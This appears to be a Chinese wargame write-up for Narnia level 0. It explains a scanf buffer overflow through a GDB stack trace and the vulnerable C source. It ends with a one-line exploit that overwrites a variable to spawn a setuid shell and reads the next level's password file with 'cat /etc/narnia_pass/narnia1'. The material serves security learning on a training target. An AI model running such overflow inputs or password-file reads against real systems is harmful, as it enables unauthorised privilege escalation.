0x01-逆向-scanf使用不当造成内存控制

目录

这是什么?

进入逆向的世界。以一个 war game 作为开场,后续不断深入。

这个 war game 是 narnia链接此处

Level 0 -> Level 9,难度不断增加。

踏出第一步,Level 0.

根据官网的提示,SSH 连接到服务器。

在这里插入图片描述

所有源文件都在 /narnia 目录,并有编译好的二进制。直接运行即可。所需要解锁的密码在 /etc/narnia_pass/ 文件夹。比如这是 Level 0,用户是 narnia0,那么下一级别 narnia1 用户的密码就在 /etc/narnia_pass/narnia1 里。看完本篇,大家就知道整体流程了。

在这里插入图片描述

文章越写越长,一段小小的代码,原本不知道会有这么多东西可以挖掘。但是只有挖的够深,才能学到更多。

可以学到什么?

开篇比较简单,但是也有值得学习的地方。几个点拿出来一起学习讨论。

数据类型长度

再后面的小节中会看到源码中对于变量 val 的定义:

long val=0x41414141

了解一下各个 data type 的长度没有坏处。这里可以找到 Wiki 的详细解释

long 类型的长度,在任何机器上,至少是 32 位,它的表述范围是 [−2,147,483,647, +2,147,483,647]。

Level 0 的设计,就是要我们覆盖 val 这 32 位的地址空间。继续往后看。

管道

管道是再也熟悉不过的概念了,将一个命令的输出,作为另一个命令的输入。例如这样:

在这里插入图片描述

那么,如果要传递两个或者两个以上命令的结果作为第二个命令的输入该怎么做?

比如有三个文件,需要一起输出并排序。

在这里插入图片描述

应该这样做:

(cat 1.txt; cat 2.txt; cat 3.txt) | sort

在这里插入图片描述

格式化输出

格式化输出 Cheetsheet

作为工具,列在这里。逆向大概率绕不开看源码,所以输出格式化也是源码阅读中非常重要的一部分。

Endianess

我不是专家,所以把这个问题留给 Wiki。Wiki 做出了很好的解释

虽然是一个常见的话题,但是最为新手的我总会在实践当中忘记这一点,导致最终的 shellcode 无效。列在这里,作为提醒。

x86 系列的 CPU,都是 Little-Endian,意味写入程序的 shellcode,都应该从最低位开始。例如要写入 0xdeadbeef 到程序,应该使用如下方式:

echo -e '\xef\xbe\xad\xde' | ./program

Setuid

这个漏洞程序的 setuid bit 是设置了的。

在这里插入图片描述

Setuid 可以让运行程序的用户暂时获取程序拥有者的权限。也就是说,我以 narnia0 的身份运行 narnia0,因为设置了 setuid,所以我能暂时获得 narnia1 用户的权限,也就可以查看 /etc/narnia_pass/narnia1 文件的内容,获取到 narnia1 用户的密码。

这里有更详细的解释

https://en.wikipedia.org/wiki/Setuid

GDB基础

Debuggin with GDB 是学习 GDB 的好文,可以持续学习。

最直观的学习方式,就是用 GDB 一步一步分析程序的运行过程,对比寄存器的变化。

在目标机器上运行

gdb program-name

获取汇编代码:

# 默认反汇编使用 AT&T 语法,有很多的 % 之类的符号,为了阅读更清晰,多采用 intel 语法
set disassembley-flavor intel

# 反汇编 main 函数
disassemble main

这是目标机器上的汇编:

在这里插入图片描述

通过分析执行的逻辑,就可以知道栈里面有什么,每个元素有多少空间分配,以及他们的顺序是什么样的。我把重点代码列在下面:

0x0804855b <+0>:	push 	ebp # 【1】ebp 入栈,ESP 当前指向 0x0804855c
0x0804855c <+1>: 	mov    	ebp,esp # 将 esp 保存到 ebp
0x0804855e <+3>:	push	ebx # 【2】ebx 入栈,ESP 当前指向 0x0804855f
0x0804855f <+4>:	sub		esp,0x18	# 0x18 是十进制 24,这里分配了 24 个字节给所有的局部变量 也就是 val 和 buf,
0x08048562 <+7>: 	mov		DWORD PTR [esp - 0x8],0x41414141	# 将 val 变量移入栈
0x08048569 <+14>:	push   	0x8048690
...
0x08048573 <+24>:	add    	esp,0x4
0x08048576 <+27>:	push   	0x80486c3
...
0x08048580 <+37>:	add    	esp,0x4
0x08048583 <+40>:	lea    	eax,[ebp-0x1c]
0x08048586 <+43>:	push   	eax
0x08048587 <+44>:	push   	0x80486d9
0x08048591 <+54>:	add    	esp,0x8
0x08048594 <+57>:	lea    	eax,[ebp-0x1c]
0x08048597 <+60>:	push   	eax
0x08048598 <+61>:	push   	0x80486de
...
0x080485a2 <+71>:	add    	esp,0x8
0x080485a5 <+74>:	push   	DWORD PTR [ebp-0x8]
0x080485a8 <+77>:	push   	0x80486e7
...
0x080485b2 <+87>:    add    	esp,0x8
0x080485b5 <+90>:	 cmp    	DWORD PTR [ebp-0x8],0xdeadbeef

单步运行,关注 registers 的情况。

# 打断点
break *0x0804855b
...

# 运行程序
run

# 查看寄存器情况
info registers

# 执行下一行代码
n

以下是每一行代码执行之后 registers 截图。

建议阅读这两篇文章,第一篇对汇编的方法调用的模式做了讲解,看完之后对下面要讲的前4行代码,能有更深的理解。第二篇讲了什么是 Stack Frame,也就是我们分析的栈空间。

汇编的每个方法调用

什么是 Stack Frame?

第 0 步(程序开始,准备执行第 1 行代码):

在这里插入图片描述

在这里插入图片描述

ESP 当前指向 0xffffd6dc,EIP 当前指向 0x0804855b。

第 1 步(第 1 行代码执行完毕,准备执行第 2 行代码):

在这里插入图片描述

在这里插入图片描述

第 1 行代码 push ebp 执行之后。

【上一步:ESP 指向 0xffffd6dc,EIP 指向 0x0804855b。】
ESP 当前指向 0xffffd6d8,EIP 当前指向 0x0804855b。
ESP 向低位移动了 4 个字节(dc - d8),EBP 入栈。

栈内情况:(栈底)EBP。

第 2 步(第 2 行代码执行完毕,准备执行第 3 行代码):

在这里插入图片描述

参数列表和局部变量都从 0xffffd6d8 开始,这是上一步 ESP 的位置。

在这里插入图片描述

第 2 行代码 mov ebp,esp 执行之后。

【上一步:ESP 指向 0xffffd6d8,EIP 指向 0x0804855b。】
ESP 当前指向 0xffffd6d8,EIP 当前指向 0x0804855e。
ESP 不变,ESP 的值被存入了 EBP(见上图)。

第 3 步(第 3 行代码执行完毕,准备执行第 4 行代码):

在这里插入图片描述

在这里插入图片描述

第 3 行代码 push ebx 执行之后。

【上一步:ESP 指向 0xffffd6d8,EIP 指向 0x0804855e。】
ESP 当前指向 0xffffd6d4,EIP 当前指向 0x0804855f。
ESP 向低位移动了 4 个字节,EBX 入栈。

栈内情况:(栈底)EBP -> EBX

第 4 步:

在这里插入图片描述

在这里插入图片描述

第 4 行代码 sub esp,0x18 执行之后。

【上一步:ESP 指向 0xffffd6d4,EIP 指向 0x0804855f。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048562。
ESP 向低位移动了 24 个字节,为局部变量(val,buf)分配了空间。val 有 4 个字节,buf 有 20 个字节。

栈内情况:(栈底)EBP -> EBX

第 5 步:

在这里插入图片描述

在这里插入图片描述

第 5 行代码 mov DWORD PTR [ebp-0x8],0x41414141 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048562。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048569。
ESP 不变,val 的值写入 ebp - 0x8 (d0) 的位置。注意是写入,不是入栈。所以 val 的位置紧跟在 EBX 之后。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141)

第 6 步:

在这里插入图片描述

push 0x8048690 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048569。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x0804856e。
ESP 向低位移动 4 个字节(bc - b8),0x8048690 入栈。

20 个字节的空位就是 buf 的位置。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x8048690

第 7 步:

在这里插入图片描述

call 0x80483f0 <puts@plt> 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x0804856e。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x08048573。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x8048690

第 8 步:

在这里插入图片描述

add esp,0x4 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x08048573。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048576。
ESP 向高位移动 4 个字节。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x8048690

第 9 步:

在这里插入图片描述

push 0x80486c3 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048576。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x0804857b。
ESP 向低位移动 4 个字节。0x80486c3 覆盖掉之前的 0x8048690。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x80486c3

第 10 步:

在这里插入图片描述

call 0x80483d0 <printf@plt> 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x0804857b。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x08048580。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x80486c3

第 11 步:

在这里插入图片描述

add esp,0x4 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x08048580。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048583。
ESP 向高位移动 4 个字节。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x80486c3

第 12 步:

在这里插入图片描述

lea eax,[ebp-0x1c] 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048583。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048586。
ESP 不变。lea 将一个内存地址,放入 EAX。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> 0x80486c3

第 13 步:

在这里插入图片描述

push eax 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048586。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x08048587。
ESP 向低位移动 4 个字节。eax入栈,覆盖掉 0x80486c3。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax

第 14 步:

在这里插入图片描述

push 0x80486d9 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x08048587。】
ESP 当前指向 0xffffd6b4,EIP 当前指向 0x0804858c。
ESP 向低位移动 4 个字节。0x80486d9入栈。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486d9

第 15 步:

在这里插入图片描述

call 0x8048440 <__isoc99_scanf@plt> 执行之后,我输入了 20 个 A 加上 4 个 B。

【上一步:ESP 指向 0xffffd6b4,EIP 指向 0x0804858c。】
ESP 当前指向 0xffffd6b4,EIP 当前指向 0x08048591。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486d9

第 16 步:

在这里插入图片描述

add esp,0x8 执行之后。

【上一步:ESP 指向 0xffffd6b4,EIP 指向 0x08048591。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048594。
ESP 向高位移动 8 个字节。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486d9

第 17 步:

在这里插入图片描述

lea eax,[ebp-0x1c] 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048594。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x08048597。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486d9

第 18 步:

在这里插入图片描述

push eax 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x08048597。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x08048598。
ESP 向低位移动 4 个字节。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486d9

第 19 步:

在这里插入图片描述

push 0x80486de 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x08048598。】
ESP 当前指向 0xffffd6b4,EIP 当前指向 0x0804859d。
ESP 向低位移动 4 个字节。0x80486de 入栈,覆盖 0x80486d9。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486de

第 20 步:

在这里插入图片描述

call 0x80483d0 <printf@plt> 执行之后。

【上一步:ESP 指向 0xffffd6b4,EIP 指向 0x0804859d。】
ESP 当前指向 0xffffd6b4,EIP 当前指向 0x080485a2。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486de

第 21 步:

在这里插入图片描述

add esp,0x8 执行之后。

【上一步:ESP 指向 0xffffd6b4,EIP 指向 0x080485a2。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x080485a5。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> eax -> 0x80486de

第 22 步:

在这里插入图片描述

push DWORD PTR [ebp-0x8] 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x080485a5。】
ESP 当前指向 0xffffd6b8,EIP 当前指向 0x080485a8。
ESP 向低位移动 4 个字节。ebp - 0x8 位置上的值就是 val 的值,入栈。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> val (0x???) -> 0x80486de

第 23 步:

在这里插入图片描述

push 0x80486e7 执行之后。

【上一步:ESP 指向 0xffffd6b8,EIP 指向 0x080485a8。】
ESP 当前指向 0xffffd6b4,EIP 当前指向 0x080485ad。
ESP 向低位移动 4 个字节。0x80486e7 入栈,覆盖 0x80486de。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> val (0x???) -> 0x80486e7

第 24 步:

在这里插入图片描述

call 0x80483d0 <printf@plt> 执行之后。

【上一步:ESP 指向 0xffffd6b4,EIP 指向 0x080485ad。】
ESP 当前指向 0xffffd6b4,EIP 当前指向 0x080485b2。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> val (0x???) -> 0x80486e7

第 25 步:

在这里插入图片描述

add esp,0x8 执行之后。

【上一步:ESP 指向 0xffffd6b4,EIP 指向 0x080485b2。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x080485b5。
ESP 向高位移动 8 个字节。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> val (0x???) -> 0x80486e7

第 26 步:

在这里插入图片描述

cmp DWORD PTR [ebp-0x8],0xdeadbeef 执行之后。

【上一步:ESP 指向 0xffffd6bc,EIP 指向 0x080485b5。】
ESP 当前指向 0xffffd6bc,EIP 当前指向 0x080485bc。
ESP 不变。

栈内情况:(栈底)EBP -> EBX -> 变量 val (0x41414141) -> 20 个字节空位 -> val (0x???) -> 0x80486e7

到这里,经过这么一些列的操作,这里将 ebp - 0x8 位置上的值和 0xdeadbeef 做比较,再决定后面的流程。

回看第 15 步,调用 scanf 方法接受输入,我输入了 20 个 A 加 4 个 B。

输入完成之后,使用

x/s address

查看内存中的内容。

在这里插入图片描述

可以看到 20 个 A 从 bc 位置开始写入。

又可以看到,在 d0 的位置,开始写入了 4 个 B

在这里插入图片描述

回看第 5 步,val 的值是被写入到 d0 (ebp - 0x8) 的位置,因此,val 的值被覆盖了。

回看第 26 步,取的就是 [ebp - 0x8] 也就是 d0 位置上的值与 0xdeadbeef 进行比较,正是我们可以覆盖的值。

整个分析就结束了。

内存

能看完上面 GDB 的分析,相比对于该程序的栈在内存中的样子应该了解了。

程序在内存中大致如下图:

在这里插入图片描述

scanf 方法对于输入的长度没有检测,所以输入 24 个字符之后,val 被覆盖。

如何利用这个漏洞?

源码如下:

#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

只要输入的 val 等于 0xdeadbeef,就会 narnia1 的身份调用 /bin/sh(之前说过这个程序是 setuid 的程序,回看)。那么写入目标值,并将 cat /etc/narnia_pass/narnia1 作为 system 调用的输入。

(python -c 'print "A" * 20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | ./narnia0

升级成功,获取到 narnia1 的密码,可以登录到 narnia1,接受下一个挑战。

在这里插入图片描述

参考链接

  • https://stackoverflow.com/questions/11917708/pipe-multiple-commands-into-a-single-command
  • https://en.wikipedia.org/wiki/Endianness
  • https://stackoverflow.com/questions/32455684/unix-linux-difference-between-real-user-id-effective-user-id-and-saved-user
  • https://www.geeksforgeeks.org/real-effective-and-saved-userid-in-linux/
  • https://en.wikipedia.org/wiki/C_data_types
  • https://stackoverflow.com/questions/15108932/c-the-x-format-specifier
  • https://www.geeksforgeeks.org/signals-c-language/
  • https://www.geeksforgeeks.org/signals-c-set-2/
  • https://en.wikipedia.org/wiki/C_signal_handling
  • https://en.wikipedia.org/wiki/Signal_(IPC)
  • http://sourceware.org/gdb/current/onlinedocs/gdb/Machine-Code.html
  • https://alvinalexander.com/programming/printf-format-cheat-sheet/
  • https://sourceware.org/gdb/current/onlinedocs/gdb/Frames.html
  • https://en.wikipedia.org/wiki/Setuid
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值